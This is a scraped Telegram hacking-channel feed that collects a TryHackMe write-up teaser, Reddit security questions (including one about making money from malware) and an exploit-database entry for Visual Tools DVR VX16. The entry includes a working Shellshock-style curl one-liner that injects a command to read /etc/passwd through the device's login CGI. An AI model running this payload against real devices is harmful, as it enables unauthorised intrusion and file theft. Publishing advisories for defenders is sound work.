Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.8K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
TryHackMe: Thompson — Writeup

https://cdn-images-1.medium.com/max/1014/1*FN05pb6NgvgWXAuigu6oEQ.png
In this article, we will show how to exploit vulnerabilities to hack the Thompson machine developed for TryHackMe, available here.

Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Deep Web
Found this link on Google (search engine/browser). Why is it there, and is it dangerous?

It didn't really lead to anything. However, I don't know much about the deep/dark web, so if someone can enlighten me on whether this is dangerous or not, be it from a legal aspect or from a leaked information/virus aspect:

http://hwikis25cffertqe.onion.ly/wiki/index.php?title=My_Dearest_Self_with_Malice_Aforethought

(I've changed the hyperlink to Google just in case someone accidentally clicks on it).

Alternatively, you can Google it by searching the search term:

my dearest self with malice aforethought wiki (it's a manga name)

It'll show up as the second result.

submitted by /u/supersaiyan491
[link] [comments]
Oraichain recognizes the community’s value in bringing security and completeness to Oraichain and its ecosystem. We welcome and seek to…Continue reading on Oraichain » (https://blog.orai.io/introducing-bug-bounty-program-for-oraichain-and-its-ecosystem-6f65316ef0d?source=rss------bug_bounty-5)
hacking: security in practice
Working out encryption algorithms

does anyone know of any tools or methods to work out the encryption patterns of a file?

i have the file in its encrypted format and I can get the decrypted version

Is there some sort of tool or program where I can upload the before and after and get the method of how it's being encrypted? It's plain text when decrypted

I basically need to edit the file then encrypt it outside of the program that uses it

submitted by /u/DuglandJones
[link] [comments]
hacking: security in practice
Guys, I know how to write malware and want to use this knowledge in bug bounty

I know how to write malware like reverse shell and many other exploits. Is there a way that I can use this in bug bounty. Like write exploit and malware and tell the company and report them? I want to use my malware development knowledge in bug bounty. Is there any legal way to make money by writing malware?

submitted by /u/Repulsive-Bedroom883
[link] [comments]
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Visual Tools DVR VX16 4.2.28.0 Command Injection

https://3.bp.blogspot.com/--aVxNCIn1VA/WWlvnVN-uzI/AAAAAAAAIRQ/ADDhvty6Qn8T3Zf1bX42ni77vOOnTgOQwCLcBGAs/s1600/hack_img5.png
Visual Tools DVR VX16 version 4.2.28.0 suffers from a command injection vulnerability.

MD5 | 2a98ba238b079ac6b1a61eec1764ca2a

Download
# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.

# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py

Source:packetstormsecurity.com